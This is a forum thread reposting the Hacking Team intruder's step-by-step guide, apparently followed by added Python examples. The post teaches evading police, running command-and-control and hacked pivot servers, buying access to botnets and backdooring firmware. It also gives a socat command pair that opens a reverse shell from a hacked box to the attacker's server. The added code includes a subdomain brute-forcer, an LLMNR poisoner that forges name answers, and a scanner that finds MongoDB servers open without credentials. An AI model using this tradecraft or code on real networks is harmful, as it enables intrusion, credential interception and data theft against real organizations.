Thread: How to hack, Tips and Tutorials from REAL "Hacker"
2nd May 2016, 12:46 #1
cybersniper (Radiant Heir of Apollo)
How to hack, Tips and Tutorials from REAL "Hacker"
Just sharing, fellow SBs who want to learn HACKING: you'll get lots of Tips and Tutorials here on how to be
successful while hacking and not to get caught :)
For those of you who want to know how he hacked the HACKING TEAM (the controversial government spying and hacking tool seller)
here's the story, GO HERE!
And for those of you who want to know the STEP BY STEP Tips, Techniques and Tutorials. :)
You used to have to sneak into offices to leak documents [2]. You used to need
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
Like the CNT said after the Gamma Group hack: "Let's take a step forward with
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight!
[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] https://en.wikipedia.org/wiki/Citize...tigate_the_FBI
[3] http://www.aljazeera.com/news/2015/0...083914167.html
[4] https://securelist.com/files/2015/02...ak_APT_eng.pdf
[5] http://madrid.cnt.es/noticia/conside...agammagroup
[2 Hacking Team]
Hacking Team was a company that helped governments hack and spy on
journalists, activists, political opposition, and other threats to their power
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende
RCS". They also claimed to have technology to solve the "problem" posed by Tor
and the darknet [13]. But seeing as I'm still free, I have my doubts about
its effectiveness.
[1] http://www.animalpolitico.com/2015/0...najepolitico/
[2] http://www.prensa.com/politica/clave...251324994.html
[3] http://www.24horas.mx/ecuadorespio...rlosfigueroa/
[4] https://citizenlab.org/2012/10/backd...ngofdissent/
[5] https://citizenlab.org/2014/02/hacki...njournalists/
[6] https://citizenlab.org/2015/03/hacki...getedspyware/
[7] http://focusecuador.net/2015/07/08/h...osenecuador/
[8] http://www.pri.org/stories/2015070...sarepersonal
[9] https://theintercept.com/2015/07/07/...ivecountries/
[10] http://www.wired.com/2013/06/spytoo...ogovernments/
[11] http://www.theregister.co.uk/2015/07...m_vietnam_apt/
[12] http://www.ilmessaggero.it/primopian...m1588888.html
[13] http://motherboard.vice.com/en_ca/re...kthedarkweb
5/4/2016 http://www.symbianize.com/showthread.php?t=1349631&highlight=open+vpn
[3 Stay safe out there]
Unfortunately, our world is backwards. You get rich by doing bad things and go
to jail for doing good. Fortunately, thanks to the hard work of people like
the Tor project [1], you can avoid going to jail by taking a few simple
precautions:
1) Encrypt your hard disk [2]
I guess when the police arrive to seize your computer, it means you've
already made a lot of mistakes, but it's better to be safe.
2) Use a virtual machine with all traffic routed through Tor
This accomplishes two things. First, all your traffic is anonymized through
Tor. Second, keeping your personal life and your hacking on separate
computers helps you not to mix them by accident.
You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
something custom [6]. Here's [7] a detailed comparison.
3) (Optional) Don't connect directly to Tor
Tor isn't a panacea. They can correlate the times you're connected to Tor
with the times your hacker handle is active. Also, there have been
successful attacks against Tor [8]. You can connect to Tor using other
people's wifi. Wifislax [9] is a linux distro with a lot of tools for
cracking wifi. Another option is to connect to a VPN or a bridge node [10]
before Tor, but that's less secure because they can still correlate the
hacker's activity with your house's internet activity (this was used as
evidence against Jeremy Hammond [11]).
The reality is that while Tor isn't perfect, it works quite well. When I
was young and reckless, I did plenty of stuff without any protection (I'm
referring to hacking) apart from Tor, that the police tried their hardest
to investigate, and I've never had any problems.
[1] https://www.torproject.org/
[2] https://info.securityinabox.org/es/chapter4
[3] https://www.whonix.org/
[4] https://tails.boum.org/
[5] https://www.qubes-os.org/doc/privacy/torvm/
[6] https://trac.torproject.org/projects...ansparentProxy
[7] https://www.whonix.org/wiki/Comparison_with_Others
[8] https://blog.torproject.org/blog/tor...mationattack/
[9] http://www.wifislax.com/
[10] https://www.torproject.org/docs/bridges.html.en
[11] http://www.documentcloud.org/documen...anarchaos.html
[3.1 Infrastructure]
I don't hack directly from Tor exit nodes. They're on blacklists, they're
slow, and they can't receive connect-backs. Tor protects my anonymity while I
connect to the infrastructure I use to hack, which consists of:
1) Domain Names
For C&C addresses, and for DNS tunnels for guaranteed egress.
2) Stable Servers
For use as C&C servers, to receive connect-back shells, to launch attacks,
and to store the loot.
3) Hacked Servers
For use as pivots to hide the IP addresses of the stable servers. And for
when I want a fast connection without pivoting, for example to scan ports,
scan the whole internet, download a database with sqli, etc.
Obviously, you have to use an anonymous payment method, like bitcoin (if it's
used carefully).
[3.2 Attribution]
In the news we often see attacks traced back to government-backed hacking
groups ("APTs"), because they repeatedly use the same tools, leave the same
footprints, and even use the same infrastructure (domains, emails, etc).
They're negligent because they can hack without legal consequences.
I didn't want to make the police's work any easier by relating my hack of
Hacking Team with other hacks I've done or with names I use in my day to day
work as a blackhat hacker. So, I used new servers and domain names, registered
with new emails, and paid for with new bitcoin addresses. Also, I only used
tools that are publicly available, or things that I wrote specifically for
this attack, and I changed my way of doing some things to not leave my usual
forensic footprint.
[4 Information Gathering]
Although it can be tedious, this stage is very important, since the larger the
attack surface, the easier it is to find a hole somewhere in it.
[4.1 Technical Information]
Some tools and techniques are:
1) Google
A lot of interesting things can be found with a few well chosen search
queries. For example, the identity of DPR [1]. The bible of Google hacking
is the book "Google Hacking for Penetration Testers". You can find a short
summary in Spanish at [2].
2) Subdomain Enumeration
Often, a company's main website is hosted by a third party, and you'll find
the company's actual IP range thanks to subdomains like mx.company.com or
ns1.company.com. Also, sometimes there are things that shouldn't be exposed
in "hidden" subdomains. Useful tools for discovering domains and subdomains
are fierce [3], theHarvester [4], and recon-ng [5].
3) Whois lookups and reverse lookups
With a reverse lookup using the whois information from a domain or IP range
of a company, you can find other domains and IP ranges. As far as I know,
there's no free way to do reverse lookups aside from a google "hack":
    "via della moscova 13" site:www.findip-address.com
    "via della moscova 13" site:domaintools.com
4) Port scanning and fingerprinting
Unlike the other techniques, this talks to the company's servers. I
include it in this section because it's not an attack, it's just
information gathering. The company's IDS might generate an alert, but you
don't have to worry since the whole internet is being scanned constantly.
For scanning, nmap [6] is precise, and can fingerprint the majority of
services discovered. For companies with very large IP ranges, zmap [7] or
masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
sites.
[1] http://www.nytimes.com/2015/12/27/bu...silkroad.html
[2] http://web.archive.org/web/201406100...con_google.pdf
[3] http://ha.ckers.org/fierce/
[4] https://github.com/laramies/theHarvester
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
[6] https://nmap.org/
[7] https://zmap.io/
[8] https://github.com/robertdavidgraham/masscan
[9] http://www.morningstarsecurity.com/research/whatweb
[10] http://blindelephant.sourceforge.net/
[4.2 Social Information]
For social engineering, it's useful to have information about the employees,
their roles, contact information, operating system, browser, plugins,
software, etc. Some resources are:
1) Google
Here as well, it's the most useful tool.
2) theHarvester and recon-ng
I already mentioned them in the previous section, but they have a lot more
functionality. They can find a lot of information quickly and
automatically. It's worth reading all their documentation.
3) LinkedIn
A lot of information about the employees can be found here. The company's
recruiters are the most likely to accept your connection requests.
4) Data.com
Previously known as jigsaw. They have contact information for many
employees.
5) File Metadata
A lot of information about employees and their systems can be found in
metadata of files the company has published. Useful tools for finding
files on the company's website and extracting the metadata are metagoofil
[1] and FOCA [2].
[1] https://github.com/laramies/metagoofil
[2] https://www.elevenpaths.com/es/labst...a2/index.html
[5 Entering the network]
There are various ways to get a foothold. Since the method I used against
Hacking Team is uncommon and a lot more work than is usually necessary, I'll
talk a little about the two most common ways, which I recommend trying first.
[5.1 Social Engineering]
Social engineering, specifically spear phishing, is responsible for the
majority of hacks these days. For an introduction in Spanish, see [1]. For
more information in English, see [2] (the third part, "Targeted Attacks"). For
fun stories about the social engineering exploits of past generations, see
[3]. I didn't want to try to spear phish Hacking Team, as their whole business
is helping governments spear phish their opponents, so they'd be much more
likely to recognize and investigate a spear phishing attempt.
[1] http://www.hacknbytes.com/2016/01/ap...onempire.html
[2] http://blog.cobaltstrike.com/2015/09...rseandnotes/
[3] http://www.netcomunity.com/lesterthe...ingsocial1.pdf
[5.2 Buying Access]
Thanks to hardworking Russians and their exploit kits, traffic sellers, and
bot herders, many companies already have compromised computers in their
networks. Almost all of the Fortune 500, with their huge networks, have some
bots already inside. However, Hacking Team is a very small company, and most
of its employees are infosec experts, so there was a low chance that they'd
already been compromised.
[5.3 Technical Exploitation]
After the Gamma Group hack, I described a process for searching for
vulnerabilities [1]. Hacking Team had one public IP range:
    inetnum: 93.62.139.32 - 93.62.139.47
    descr:   HT public subnet
Hacking Team had very little exposed to the internet. For example, unlike
Gamma Group, their customer support site needed a client certificate to
connect. What they had was their main website (a Joomla blog in which Joomscan
[2] didn't find anything serious), a mail server, a couple routers, two VPN
appliances, and a spam filtering appliance. So, I had three options: look for
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
embedded devices. A 0day in an embedded device seemed like the easiest option,
and after two weeks of work reverse engineering, I got a remote root exploit.
Since the vulnerabilities still haven't been patched, I won't give more
details, but for more information on finding these kinds of vulnerabilities,
see [3] and [4].
[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] http://sourceforge.net/projects/joomscan/
[3] http://www.devttys0.com/
[4] https://docs.google.com/presentation...mDA2z9zzHpon8A
[6 Be Prepared]
I did a lot of work and testing before using the exploit against Hacking Team.
I wrote a backdoored firmware, and compiled various post-exploitation tools
for the embedded device. The backdoor serves to protect the exploit. Using the
exploit just once and then returning through the backdoor makes it harder to
identify and patch the vulnerabilities.
The post-exploitation tools that I'd prepared were:
1) busybox
For all the standard Unix utilities that the system didn't have.
2) nmap
To scan and fingerprint Hacking Team's internal network.
3) Responder.py
The most useful tool for attacking windows networks when you have access to
the internal network, but no domain user.
4) Python
To execute Responder.py
5) tcpdump
For sniffing traffic.
6) dsniff
For sniffing passwords from plaintext protocols like ftp, and for
arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR
and NaGA, but it was hard to compile it for the system.
7) socat
For a comfortable shell with a pty:
    my_server:  socat file:`tty`,raw,echo=0 tcp-listen:my_port
    hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
                tcp:my_server:my_port
And useful for a lot more, it's a networking swiss army knife. See the
examples section of its documentation.
8) screen
Like the shell with pty, it wasn't really necessary, but I wanted to feel
at home in Hacking Team's network.
9) a SOCKS proxy server
To use with proxychains to be able to access their local network from any
program.
10) tgcd
For forwarding ports, like for the SOCKS server, through the firewall.
[1] https://www.busybox.net/
[2] https://nmap.org/
[3] https://github.com/SpiderLabs/Responder
[4] https://github.com/bendmorris/static-python
[5] http://www.tcpdump.org/
[6] http://www.monkey.org/~dugsong/dsniff/
[7] http://www.dest-unreach.org/socat/
[8] https://www.gnu.org/software/screen/
[9] http://averagecoder.blogspot.com/20...rverinc.html
[10] http://tgcd.sourceforge.net/
The worst thing that could happen would be for my backdoor or post-exploitation
tools to make the system unstable and cause an employee to investigate. So I
spent a week testing my exploit, backdoor, and post-exploitation tools in the
networks of other vulnerable companies before entering Hacking Team's network.
[7 Watch and Listen]
Now inside their internal network, I wanted to take a look around and think
about my next step. I started Responder.py in analysis mode (-A to listen
without sending poisoned responses), and did a slow scan with nmap.
[8 NoSQL Databases]
NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
community [1]. Just when I was worried that they'd finally patched all of the
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
style that lack authentication by design. Nmap found a few in Hacking Team's
internal network:
    27017/tcp open  mongodb  MongoDB 2.6.5
    | mongodb-databases:
    |   ok = 1
    |   totalSizeMb = 47547
    |   totalSize = 49856643072
    ...
    |_  version = 2.6.5
    27017/tcp open  mongodb  MongoDB 2.6.5
    | mongodb-databases:
    |   ok = 1
    |   totalSizeMb = 31987
    |   totalSize = 33540800512
    |   databases
    ...
    |_  version = 2.6.5
They were the databases for test instances of RCS. The audio that RCS records
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
from this. They were spying on themselves without meaning to.
[1] https://www.shodan.io/search?query=product%3Amongodb
[2] https://community.rapid7.com/communi...flawinmysql
[3] http://archives.neohapsis.com/archiv...4q3/0001.html
[4] http://downloads.securityfocus.com/v...hoagie_mysql.c
[5] http://archives.neohapsis.com/archiv...002/0053.html
[6] https://ht.transparencytoolkit.org/audio/
CONTINUATION............... (it doesn't fit anymore, apparently the raw text is too many characters, hehe :))
FOR COMPLETE TUTORIAL VISIT
http://pinoyprogrammer.co/vigilante...teamexplains/
Updated
Last edited by cybersniper, 2nd May 2016 at 16:58.
"I Wouldn't Say I'm a Hacker"
"I Would Say! I AM a Researcher"
"And I post all my Research in one Place AND SHARE IT TO OTHERS"
http://pinoyprogrammer.co/ :)
Visit my site to find out more and access all my RESEARCH in
"SECURITY, HACKING, PROGRAMMING, WEB DEVELOPMENT
AND INTERNET TIPS AND TRICKS"
1 User Says Thank You to cybersniper For This Useful Post.
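Added example for section 4.1 (subdomain enumeration) of the post above; this is not code from the post, nor from fierce, theHarvester or recon-ng. It brute-forces subdomains with an injectable resolver, discards wildcard DNS hits (a false-positive source every brute-forcer has to handle), and groups what resolves by /24 so that a third-party-hosted www stands apart from the netblock that holds mx, ns1 and vpn. The FAKE_DNS table, the example.com / wild.test names and the addresses in them are constructed for the example; the default resolver does real lookups through the OS.

```python
"""Subdomain brute force with wildcard filtering and netblock grouping.

Added example, not code from the original post or from any of the tools it
names. Everything in FAKE_DNS / FAKE_WILDCARD_DNS is constructed sample data.
"""
import ipaddress
import secrets
import socket
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, List, Optional

Resolver = Callable[[str], Optional[str]]


def system_resolver(name: str) -> Optional[str]:
    """Real lookup through the OS resolver; None when the name does not resolve."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def wildcard_ip(domain: str, resolve: Resolver) -> Optional[str]:
    """Resolve a random label under the domain. If it answers, the zone has a
    wildcard record and every candidate landing on that IP is a false positive."""
    return resolve(f"{secrets.token_hex(8)}.{domain}")


def enumerate_subdomains(domain: str, words: List[str],
                         resolve: Resolver = system_resolver,
                         workers: int = 8) -> Dict[str, str]:
    """Return {fqdn: ip} for every candidate that resolves to a non-wildcard address."""
    wc = wildcard_ip(domain, resolve)
    candidates = [f"{w}.{domain}" for w in words]
    found: Dict[str, str] = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for fqdn, ip in zip(candidates, pool.map(resolve, candidates)):
            if ip and ip != wc:
                found[fqdn] = ip
    return found


def group_by_netblock(found: Dict[str, str], prefix: int = 24) -> Dict[str, List[str]]:
    """Group resolved names by the /prefix network containing their address."""
    groups: Dict[str, List[str]] = {}
    for fqdn, ip in sorted(found.items()):
        net = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
        groups.setdefault(str(net), []).append(fqdn)
    return groups


# Hostname prefixes that usually sit on infrastructure the company runs itself
# rather than at a web host (assumption used only for ranking).
INFRA_HINTS = ("mx", "mail", "smtp", "ns", "vpn", "fw", "gw", "owa", "remote")


def likely_own_ranges(groups: Dict[str, List[str]]) -> List[str]:
    """Netblocks ordered by how many infrastructure-style names land in them;
    the first entry is the best guess at the company's own IP range."""
    def score(item):
        names = item[1]
        return sum(any(n.split(".")[0].startswith(h) for h in INFRA_HINTS) for n in names)
    return [net for net, _ in sorted(groups.items(), key=score, reverse=True)]


# Constructed lookup table: www at a hosting provider, the rest in one /24.
FAKE_DNS = {
    "www.example.com": "203.0.113.10",
    "mx.example.com": "198.51.100.21",
    "ns1.example.com": "198.51.100.2",
    "vpn.example.com": "198.51.100.30",
    "intranet.example.com": "198.51.100.40",
}
WORDLIST = ["www", "mx", "ns1", "vpn", "intranet", "dev", "mail", "ftp"]


def fake_resolver(name: str) -> Optional[str]:
    return FAKE_DNS.get(name)


def fake_wildcard_resolver(name: str) -> Optional[str]:
    """Constructed zone with a wildcard: every name answers, only mx is real."""
    if name == "mx.wild.test":
        return "198.51.100.9"
    return "203.0.113.50" if name.endswith(".wild.test") else None


if __name__ == "__main__":
    found = enumerate_subdomains("example.com", WORDLIST, fake_resolver)
    groups = group_by_netblock(found)
    for net in likely_own_ranges(groups):
        print(net, groups[net])
```

Swap `fake_resolver` for `system_resolver` (the default) to run it against a real domain; the wildcard probe then costs one extra lookup and keeps a catch-all zone from reporting every word in the list as a hit.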
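Added example for section 7 of the post (Responder.py started with -A); this is not code from the post or from the Responder project. It parses an LLMNR query the way a listener on UDP/5355 sees it and shows the difference between analysis mode, where the lookup is only logged, and poisoning mode, where a forged A record pointing the name at the attacker is returned. The packet bytes, hostnames and IP addresses are constructed for the example; the TTL of 30 is the value Responder uses.

```python
"""LLMNR (RFC 4795) query parsing and poisoner/analysis-mode answer logic.

Added example, not code from the original post or from Responder.py.
The header is laid out like a DNS header; SAMPLE_WPAD_QUERY is constructed.
"""
import ipaddress
import struct
from dataclasses import dataclass
from typing import Optional, Tuple

LLMNR_PORT = 5355          # UDP, multicast group 224.0.0.252
QTYPE_A = 1
QCLASS_IN = 1


@dataclass
class LlmnrQuery:
    txid: int
    name: str
    qtype: int
    qclass: int


def _encode_name(name: str) -> bytes:
    r"""'wpad.corp' -> b'\x04wpad\x04corp\x00' (uncompressed labels)."""
    out = b""
    for label in name.split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("bad label length")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def _decode_name(buf: bytes, off: int) -> Tuple[str, int]:
    """Decode labels at off; return (name, offset just past the terminator)."""
    labels = []
    while True:
        if off >= len(buf):
            raise ValueError("truncated name")
        n = buf[off]
        off += 1
        if n == 0:
            break
        if n & 0xC0:
            raise ValueError("compression pointer in question section")
        labels.append(buf[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels), off


def parse_llmnr_query(pkt: bytes) -> LlmnrQuery:
    """Parse one LLMNR query datagram."""
    if len(pkt) < 12:
        raise ValueError("short packet")
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!6H", pkt[:12])
    if flags & 0x8000:
        raise ValueError("QR bit set: this is a response, not a query")
    if qdcount != 1:
        raise ValueError("LLMNR queries carry exactly one question")
    name, off = _decode_name(pkt, 12)
    if off + 4 > len(pkt):
        raise ValueError("truncated question")
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return LlmnrQuery(txid, name, qtype, qclass)


def build_poisoned_answer(q: LlmnrQuery, answer_ip: str, ttl: int = 30) -> bytes:
    """Response a poisoner sends: echo the question, add one A record that
    claims the requested name lives at answer_ip."""
    if q.qtype != QTYPE_A or q.qclass != QCLASS_IN:
        raise ValueError("only A/IN questions are answered here")
    header = struct.pack("!6H", q.txid, 0x8000, 1, 1, 0, 0)   # QR=1, 1 question, 1 answer
    question = _encode_name(q.name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    rdata = ipaddress.IPv4Address(answer_ip).packed
    answer = _encode_name(q.name) + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answer


def handle_llmnr(pkt: bytes, src: str, answer_ip: str, analyze: bool) -> Tuple[str, Optional[bytes]]:
    """Decide what to do with one received datagram: (log line, reply or None).
    In analyze mode nothing is sent; the log alone shows which hosts ask for
    which names, i.e. which ones would be poisonable."""
    q = parse_llmnr_query(pkt)
    log = f"LLMNR query from {src}: {q.name} (type {q.qtype}, id 0x{q.txid:04x})"
    if analyze:
        return log + " [analysis mode, not answered]", None
    return log + f" -> answered with {answer_ip}", build_poisoned_answer(q, answer_ip)


# Constructed sample: a Windows host asking for "wpad" (proxy autodiscovery),
# a name that usually does not exist and is therefore a classic target.
SAMPLE_WPAD_QUERY = (
    b"\x12\x34"                    # transaction id
    b"\x00\x00"                    # flags: standard query
    b"\x00\x01"                    # QDCOUNT = 1
    b"\x00\x00\x00\x00\x00\x00"    # AN/NS/AR counts
    b"\x04wpad\x00"                # question name
    b"\x00\x01\x00\x01"            # type A, class IN
)

if __name__ == "__main__":
    for mode in (True, False):
        line, resp = handle_llmnr(SAMPLE_WPAD_QUERY, "10.0.0.7", "10.0.0.99", analyze=mode)
        print(line, "" if resp is None else resp.hex())
```

To turn this into a listener, bind a UDP socket to port 5355, join 224.0.0.252 and feed each datagram to handle_llmnr; the analyze flag is the only thing that separates passive reconnaissance from active poisoning.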
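Added example for section 8 of the post (the nmap MongoDB output quoted there); this is not code from the post. It parses nmap's normal text output and flags every mongodb port where the mongodb-databases script got "ok = 1", which means listDatabases was answered with no credentials at all. The scan text embedded in the block is constructed: the first two hosts mirror the two snippets in the post, the third is a made-up host that refuses the command, and the exact wording nmap prints for such a refusal is an assumption.

```python
"""Triage nmap output for MongoDB instances that answer without authentication.

Added example, not code from the original post. SAMPLE_SCAN is constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|\s+([\w-]+):\s*$")           # "| mongodb-databases:"
KV_RE = re.compile(r"^\|[_ ]\s*(\w+)\s*=\s*(.+?)\s*$")   # "|   ok = 1", "|_  version = 2.6.5"


@dataclass
class MongoFinding:
    host: str
    port: int
    banner: str
    script_fields: Dict[str, str] = field(default_factory=dict)

    @property
    def unauthenticated(self) -> bool:
        # ok = 1 means the unauthenticated listDatabases command succeeded
        return self.script_fields.get("ok") == "1"

    @property
    def total_size_mb(self) -> Optional[int]:
        v = self.script_fields.get("totalSizeMb")
        return int(v) if v and v.isdigit() else None


def parse_nmap_mongodb(text: str) -> List[MongoFinding]:
    """Walk nmap normal output and collect mongodb-databases results per port."""
    findings: List[MongoFinding] = []
    host = None
    current: Optional[MongoFinding] = None
    in_script = False
    for raw in text.splitlines():
        line = raw.rstrip()
        m = HOST_RE.match(line)
        if m:
            host, current, in_script = m.group(1), None, False
            continue
        m = PORT_RE.match(line)
        if m:
            port, _proto, service, banner = m.groups()
            current, in_script = None, False
            if service == "mongodb" and host is not None:
                current = MongoFinding(host, int(port), banner.strip())
                findings.append(current)
            continue
        if current is None or not line.startswith("|"):
            continue
        m = SCRIPT_RE.match(line)
        if m:
            in_script = m.group(1) == "mongodb-databases"
            continue
        m = KV_RE.match(line)
        if m and in_script:
            current.script_fields[m.group(1)] = m.group(2)
    return findings


def open_instances(findings: List[MongoFinding]) -> List[MongoFinding]:
    return [f for f in findings if f.unauthenticated]


def total_exposed_mb(findings: List[MongoFinding]) -> int:
    return sum(f.total_size_mb or 0 for f in open_instances(findings))


def report(findings: List[MongoFinding]) -> List[str]:
    lines = []
    for f in findings:
        status = "NO AUTH: listDatabases answered" if f.unauthenticated else "refused without credentials"
        size = f"{f.total_size_mb} MB" if f.total_size_mb is not None else "size unknown"
        lines.append(f"{f.host}:{f.port} {f.banner} - {status} ({size})")
    return lines


# Constructed scan text. Hosts .21 and .22 follow the post's two snippets;
# host .30 is made up, and its refusal text is an assumption about nmap's output.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.1.21
PORT      STATE SERVICE VERSION
27017/tcp open  mongodb MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
|   databases
|_  version = 2.6.5

Nmap scan report for 10.10.1.22
PORT      STATE SERVICE VERSION
27017/tcp open  mongodb MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 31987
|   totalSize = 33540800512
|_  version = 2.6.5

Nmap scan report for 10.10.1.30
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7
27017/tcp open  mongodb MongoDB 3.0.4
| mongodb-databases:
|   errmsg = not authorized on admin to execute command { listDatabases: 1 }
|   code = 13
|_  ok = 0
"""

if __name__ == "__main__":
    fs = parse_nmap_mongodb(SAMPLE_SCAN)
    print("\n".join(report(fs)))
    print(f"{total_exposed_mb(fs)} MB readable without credentials")
```

Feed it real output from `nmap -sV --script mongodb-databases -p 27017 <range>` (written with -oN) to get the same triage; the fix on the server side is enabling authorization in mongod and binding it to an interface the rest of the network cannot reach.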